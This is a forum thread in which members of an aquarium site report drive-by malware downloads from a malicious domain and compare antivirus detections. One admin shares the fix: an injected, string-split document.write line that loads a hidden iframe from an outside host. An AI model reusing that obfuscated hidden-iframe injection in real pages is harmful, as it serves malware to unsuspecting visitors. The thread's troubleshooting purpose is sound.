AA main page...Trojan?

The friendliest place on the web for anyone with an interest in aquariums or fish keeping!
If you have answers, please help by responding to the unanswered posts.
*reposting this here.

Hi,

I've been having issues with this forum on my home computer.

Every time i try and access any of the pages from another site or google for example I load the first part of the php code and a basic structure of the page but then internet explorer tries to redirect me to a virus page.

The page it tries to load a page something along the lines of

s99.winmplayer.com/media/n404-6.php

This then hangs as my antivirus software kicks in to warn me about all the temp file virus's it is downloading.

The downloaded files this my temp internet folder in three forums

s99.winmplayer.com/media/n404-6.php - Virus
s99.winmplayer.com/media/n404-5.php - Trojan
s99.winmplayer.com/media/n404-4.php - Virus

It is only this site it is happening from and I seem to be able to get in fine at work (I presume their anti virus and stuff is better then mine at home - hopefully).

I'm using the latest updated version of IE and windows XP.

I will switch to firefox to use at home but I thought i should mention it here incase anyone else is having the same issue.

Thanks,

John

I have not seen that error myself at all. I used to run Norton, and now use AVG. I use the Blacksoul as well. No issues on my end.

Sometimes at home (and never at work) I get the "blip" noise and then the little bar across the top saying it's trying to install "Outlook.exe" (which is my email program anyway). Says "click here to download if you trust this source, etc..." I never do, of course, and eventually can navigate around AA. I'm running McAfee (which I actually hate) and Black Soul in IE 7.

So far, it's only a very tiny annoyance...

Last friday I had an issue where my entire machine locked when I came here. It started with my browser (Firefox 1.5) and the last thing in the status bar was "getting data from s99.winmplayer.com" But I wasn't on the home page. I was on the forum list page when this happened.

I think the lock up on my end was due to my virus scanner fighting with whatever it was that was downloading.

Is it possible that one of the ads in rotation may have something in it?

I got the same thing about 15 minutes ago. I am using avg anti spyware and anti virus.

I got a popup from some sort of AD or something for a virus/trojan. I'm using firefox and NOD32

BillyZ said:
Last friday I had an issue where my entire machine locked when I came here. It started with my browser (Firefox 1.5) and the last thing in the status bar was "getting data from s99.winmplayer.com" But I wasn't on the home page. I was on the forum list page when this happened.

I think the lock up on my end was due to my virus scanner fighting with whatever it was that was downloading.

Is it possible that one of the ads in rotation may have something in it?

Thats exactly what happens to me. I run AVG and Spybot search and destroy at home and it seems to react to it badly.

My work PC where I am now I presume blocks it with its superior antivirus stuff.

John

Hello,

I'm the admin of a poetry website (lapassiondespoemes.com). We're running a totally custom message board system and we've been having the exact same problem. I found this thread on google while searching for info on the problem.

Users reported files being downloaded from s99.winmplayer.com at first. Now it seems to have switched to s99.msiesettings.com.

I'll post more info here if ever I find any...

Frank

In addition to the Trojan you are all speaking of I also get a number of virus detections in my McAfee console:

VBS/Psyme
Exploit-CVE2006-3730
JS/Exploit-BO.gen
Exploit-MSDDS

It seems to be only the aa site that gives me these issues.

I can't believe that using FF is the only fix for this.

I can't use FF on my home computer. I've tried uninstalling, reinstalling, messing with the settings, updating, everything. It won't let me go to any site that is secure. It flat out refuses to open the pages and throws up error messages. IE is so much easier and I prefer the design.

SparKy697 said:
In addition to the Trojan you are all speaking of I also get a number of virus detections in my McAfee console:

VBS/Psyme
Exploit-CVE2006-3730
JS/Exploit-BO.gen
Exploit-MSDDS

It seems to be only the aa site that gives me these issues.

I can't believe that using FF is the only fix for this.

I got all those right when I logged on ....

BUt ive been getting trojaxs , virus, etc... for a few months now coming onto this website and its ONLY this website .. Is the owner of this site ever gonna look into it ??

Is the owner of this site ever gonna look into it ??

Not constantly posting does not mean one is not looking into this. I have been looking into this for a while and trying random code removals to correct it. This site is heavily modded and removing the wrong thing will take the site down 100%. I have never seen this message myself and I run Mcafee at work and AVG at home. Both reported as giving the error.

fishfreek said:
Is the owner of this site ever gonna look into it ??

Not constantly posting does not mean one is not looking into this. I have been looking into this for a while and trying random code removals to correct it. This site is heavily modded and removing the wrong thing will take the site down 100%. I have never seen this message myself and I run Mcafee at work and AVG at home. Both reported as giving the error.

thats weird that u never see the virus/trojan alerts .. do u use your account ??? try making a new account and see if it makes a difference ..

im using mcaffee..

Ok I'm not sure if this is going to help you guys but I've solved my problem. I had been hacked because of a vulnerability in a third party php script I was using some time ago.

I seems that when my system was comprimised, the hackers modified a very important php file in my message board system to print the following :

Code:
document.write("<ifr"+"ame src=http://goo"+"gler"+"ank.info/cou"+"nter width=1 height=1 style=displ"+"ay:none></ifra"+"me>");

Removing that solved the virus problem.

Cheers and good luck.

Back
Top Bottom